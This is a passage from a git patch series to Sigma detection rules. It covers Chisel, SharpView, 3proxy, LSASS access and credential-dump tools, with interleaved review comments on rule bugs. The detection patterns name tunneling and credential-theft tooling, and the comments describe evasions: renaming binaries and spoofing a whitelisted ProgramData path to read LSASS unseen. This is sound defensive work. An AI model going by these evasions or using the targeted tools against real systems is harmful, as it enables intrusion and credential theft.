- Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high 
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..dada69bd7 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -19,6 +19,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml 
@@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 
'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index aa0568d75..1182bd8b4 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import date: 2022/08/01 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -20,6 +21,7 @@ detection: CommandLine|contains: - 'C:\Users\' - '%temp%' + - '%tmp%' - '%appdata%' - '\AppData\Local\Temp\' - 'C:\Windows\Temp\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 7815daee9..5ca802523 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/07/28 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' selection_susp_extensions: 
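Review bot: The `CommandLine|startswith` branch of `susp_image` (`'C:\Windows\Tasks\'` through `'%Public%\'`) is only satisfiable when netsh.exe itself is launched from one of those folders, because `selection1`/`selection2` require `Image|endswith: '\netsh.exe'` and a netsh command line begins with the executable, not with the program being allowed; in practice those nine values are dead and only the `contains` list fires. The intent was presumably the program argument, so folding them into the `contains` list in the form the argument takes (`'program=C:\Windows\Tasks\'` for the `program=` syntax, plus a space-prefixed variant if positional legacy `allowedprogram` calls matter) would make them live. Since this hunk already rewrites every one of these lines, this is the moment to fix it, even if in a follow-up.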
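Review bot: The new entry is `'%tmp%'` while the existing neighbour is `'%Temp%'`, so the curl list now mixes casings for the same environment variable; the invoke_webrequest hunk in this same patch does likewise (`'%Temp%'` next to `'%tmp%'`), whereas bitsadmin, reg_import and mofcomp use lowercase for both and netsh and cmd_redirection use upper case. Sigma string matching is case-insensitive by default, so this is cosmetic, but matching the casing of the adjacent `%TEMP%`/`%temp%` entry within each rule (`- '%Temp%'` / `- '%Tmp%'` here) keeps the lists greppable and avoids the question of whether a different case was intended.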
diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index be17123fc..cddb6c356 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -9,6 +9,7 @@ author: Nasreddine Bencherchali references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ date: 2022/08/02 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +35,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' - 'C:\Windows\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index 07b7eb8f6..8d625c51f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -11,7 +11,7 @@ references: - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp date: 2022/07/12 -modified: 2022/07/14 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -31,6 +31,7 @@ detection: - '\Users\Public\' - '\WINDOWS\Temp\' - '%temp%' + - '%tmp%' - '%appdata%' condition: all of selection_* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml index 7af331728..5e97ea32b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml 
@@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7 status: experimental author: frack113 date: 2021/07/30 +modified: 2022/09/13 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md @@ -24,7 +25,9 @@ detection: - 'DOSKEY.EXE' - 'sc.exe' selection_redirect: - ParentCommandLine|contains: ' > %TEMP%\' + ParentCommandLine|contains: + - ' > %TEMP%\' + - ' > %TMP%\' condition: all of selection* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..daae592e1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -1,4 +1,4 @@ -title: Suspicious Execution of SharpView Aka PowerView +title: Suspicious Execution of SharpView Aka PowerView id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d status: experimental description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems @@ -8,14 +8,15 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - sharpview: - OriginalFileName: SharpView.exe - sharpview_methods: - Commandline|contains: + selection: + - OriginalFileName: SharpView.exe + - Image|endswith: '\SharpView.exe' + - Commandline|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping 
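Review bot: The third alternative in the new `selection` list uses the field name `Commandline`, whereas every other process_creation rule in this diff (and the standard Sigma field) is `CommandLine`; backends that map fields by exact name will leave it unmapped, so the cmdlet-name branch would silently never match. Change it to `- CommandLine|contains:`. This matters because the other two alternatives (`OriginalFileName: SharpView.exe`, `Image|endswith: '\SharpView.exe'`) are defeated by a simple rename, so the argument branch is the one doing most of the detection work. The list of method names continues past the end of this hunk.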
@@ -142,7 +143,8 @@ detection: - Get-DomainPolicy - Get-DomainGPOLocalGroup - Get-NetGPOGroup - condition: sharpview or sharpview_methods + - Invoke-Sharefinder + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index a7895ad42..95a4a857c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -10,6 +10,7 @@ tags: - attack.t1218.011 author: Christian Burkard date: 2021/11/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -23,6 +24,7 @@ detection: - '%AppData%' - '%LocalAppData%' - '%Temp%' + - '%tmp%' - '\AppData\' - '\Temp\' - '\Users\Public\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 999d77e14..7eba3a23c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker date: 2020/10/12 -modified: 2022/08/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +34,7 @@ detection: - '\Windows\Temp\' - '\AppData\Local\' - '%temp%' + - '%tmp%' - '%ProgramData%' - '%appdata%' - '%comspec%' diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 
--- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml 
@@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' @@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 From 264bc0787d6a0ecd8f81e3f3a2b8580a9f5288e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 11:30:27 +0200 Subject: [PATCH 014/120] fix: FP with Malwarebytes --- .../proc_access_win_cred_dump_lsass_access.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml 
@@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' From 3a38b63fffc361e6b84755bcc4d457ff51fb1932 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:10 +0200 Subject: [PATCH 015/120] refactor: chisel rules --- .../proc_creation_win_chisel_usage.yml | 36 ++++++++++++++++ .../proc_creation_win_sharp_chisel_usage.yml | 41 +++++++++++-------- 2 files changed, 60 insertions(+), 17 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_chisel_usage.yml diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml new file mode 100644 index 000000000..ca2ece918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml 
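Review bot: The new `filter_malwarebytes` exclusion keys on a `SourceImage` path under `C:\ProgramData\`, whose root is writable by standard users by default (whether the `MALWAREBYTES` subtree is locked down depends on the installer's ACLs), combined with `GrantedAccess: '0x1410'`, which includes PROCESS_VM_READ — the access a dumper needs. Anyone able to create that directory path can reuse the file name and read LSASS without this rule firing. The file already carries an `# easy to bypass` caveat on an older path-based filter; this one should carry the same, e.g. `filter_malwarebytes:  # path-based exclusion under ProgramData; confirm directory ACL / signer before relying on it`, and if the log source exposes a signer or hash field, narrowing on it would be preferable to the path alone. The detection block continues outside this hunk.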
@@ -0,0 +1,36 @@ +title: Chisel Tunneling Tool Usage +id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 +related: + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar +status: experimental +description: Detects usage of the Chisel tunneling tool via the commandline arguments +author: Florian Roth +references: + - https://github.com/jpillora/chisel/ +date: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\chisel.exe' + selection_param1: + CommandLine|contains: + - 'exe client ' + - 'exe server ' + selection_param2: + CommandLine|contains: + - ' --socks5' + - ' --reverse' + - ' r:' + - ':127.0.0.1:' + - ' --tls-skip-verify ' + - ':socks' + condition: selection_img or all of selection_param* +falsepositives: + - Some false positives may occure with other tools with similar commandlines +level: high diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index a28f7d2c3..7d472e237 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -1,5 +1,8 @@ title: SharpChisel Usage id: cf93e05e-d798-4d9e-b522-b0248dc61eaf +related: + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: experimental description: Detects usage of the Sharp Chisel via the commandline arguments author: Nasreddine Bencherchali 
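Review bot: `' --tls-skip-verify '` in `selection_param2` has a trailing space that the other entries in that list do not, so the flag is missed whenever it is the last argument on the command line; drop it: `- ' --tls-skip-verify'`. Since the `selection_img` branch on `\chisel.exe` is defeated by renaming the binary, the argument-based branches are the ones expected to hold up and their patterns should be exact. The `falsepositives` entry also misspells "occur" ("occure").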
@@ -7,26 +10,30 @@ references: - https://github.com/shantanu561993/SharpChisel - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ date: 2022/09/05 +modified: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 logsource: category: process_creation product: windows detection: - selection_img: + selection_1_img: Image|endswith: '\SharpChisel.exe' - selection_client_server: - CommandLine|contains: - - 'exe client ' - - 'exe server ' - selection_flags: - CommandLine|contains: - - ' --socks5' - - ' --reverse' - - ' r:' - - ':127.0.0.1:' - condition: 1 of selection_* + selection_1_pe: + Product: 'SharpChisel' + # Covered by Chisel Rule + # selection_2_client_server: + # CommandLine|contains: + # - 'exe client ' + # - 'exe server ' + # selection_2_flags: + # CommandLine|contains: + # - ' --socks5' + # - ' --reverse' + # - ' r:' + # - ':127.0.0.1:' + condition: 1 of selection falsepositives: - - Some flalse positives may occure with other tools with similar commandlines -level: medium -tags: - - attack.command_and_control - - attack.t1090.001 + - Some false positives may occure with other tools with similar commandlines +level: high From 37aed9ac3bff5a6797d27955ba46aadba3f0865e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:32 +0200 Subject: [PATCH 016/120] docs: add link --- .../windows/process_creation/proc_creation_win_chisel_usage.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml index ca2ece918..0ed05a1e0 100644 --- a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml 
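Review bot: `condition: 1 of selection` references no defined identifier: the selections are now named `selection_1_img` and `selection_1_pe`, and a `1 of <pattern>` without `*` only matches that exact name, so depending on the backend the rule either fails at conversion time or never fires. It should read `condition: 1 of selection_*`. Also, `Product` is populated only by log sources that carry PE version information (Sysmon-style process creation events), so on other sources that alternative is dead weight; a one-line comment noting the dependency would help. The commented-out `selection_2_*` blocks are fine as documentation but currently make the rule look broader than it is.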
@@ -8,6 +8,7 @@ description: Detects usage of the Chisel tunneling tool via the commandline argu author: Florian Roth references: - https://github.com/jpillora/chisel/ + - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ date: 2022/09/13 tags: - attack.command_and_control From 9f62270affd58cc8265653a0803889a7deadbcc9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:44 +0200 Subject: [PATCH 017/120] refactor: add dumpy tool --- .../file_event/file_event_win_cred_dump_tools_dropped_files.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 4c07b444c..04670a604 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -38,6 +38,7 @@ detection: - '\servpw64.exe' - '\pwdump.exe' - '\procdump64.exe' + - '\Dumpy.exe' condition: selection falsepositives: - Legitimate Administrator using tool for password recovery From fb44c6fa8709d116de3c25be623704a12375e1c0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:14:45 +0200 Subject: [PATCH 018/120] Update meta info --- rules/web/web_cve_2022_31659_vmware_rce.yml | 2 +- .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../registry_set/registry_set_disable_winevt_logging.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml 
@@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 04c010857..452485411 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -27,7 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null From 22d0e22d144bb2da73e2c3614ef0be9c66628fad Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Wed, 14 Sep 2022 10:22:01 +0200 Subject: [PATCH 019/120] rule: 3proxy usage, fix: rule - missing contains --- .../proc_creation_win_susp_3proxy_usage.yml | 26 +++++++++++++++++++ ...roc_creation_win_uac_bypass_icmluautil.yml | 4 +-- 2 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml new file mode 100644 index 000000000..3a35b6a6c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml @@ -0,0 +1,26 @@ +title: 3Proxy Usage +id: f38a82d2-fba3-4781-b549-525efbec8506 +status: experimental +description: Detects the use of 3proxy, a tiny free proxy server +author: Florian Roth +date: 2022/09/13 +references: + - https://github.com/3proxy/3proxy + - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +tags: + - attack.command_and_control + - attack.t1572 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\3proxy.exe' + selection_pe: + Description: '3proxy - tiny proxy server' + selection_params: # param combos seen in the wild + CommandLine|contains: '.exe -i127.0.0.1 -p' + condition: 1 of selection +falsepositives: + - Administrative activity +level: high diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index db964e3ad..81ef7abf7 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml 
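Review bot: `condition: 1 of selection` matches only the detection item named exactly `selection` (the `1 of` pattern is a glob, and without `*` it is an exact name), so `selection_pe` and `selection_params` are dead and the rule fires only on the `\3proxy.exe` image name, which an operator renames trivially. Use `condition: 1 of selection*`. The `Description` PE field is only available from log sources that record version info (e.g. Sysmon); a short comment on `selection_pe` saying so would save confusion for users of other sources.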
@@ -15,8 +15,8 @@ logsource: product: windows detection: selection: - Image|endswith: '\dllhost.exe' - ParentCommandLine: + PranetImage|endswith: '\dllhost.exe' + ParentCommandLine|contains: - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' filter: From 653ad66f21010ab20a7c24f7fdb2931460dfe1e3 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:29:57 +0200 Subject: [PATCH 020/120] Updates --- .../win_susp_logon_newcredentials.yml | 0 .../proc_creation_win_dnscmd_discovery.yml | 20 +++++----- ...l => proc_creation_win_ntdsutil_usage.yml} | 18 ++++----- .../proc_creation_win_susp_ditsnap.yml | 23 ++++++----- .../proc_creation_win_susp_ntdsutil_usage.yml | 38 +++++++++++++++++++ ..._creation_win_weak_or_abused_passwords.yml | 26 +++++++++++++ 6 files changed, 95 insertions(+), 30 deletions(-) rename rules/windows/builtin/{ => security}/win_susp_logon_newcredentials.yml (100%) rename rules/windows/process_creation/{proc_creation_win_susp_ntdsutil.yml => proc_creation_win_ntdsutil_usage.yml} (57%) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml create mode 100644 rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 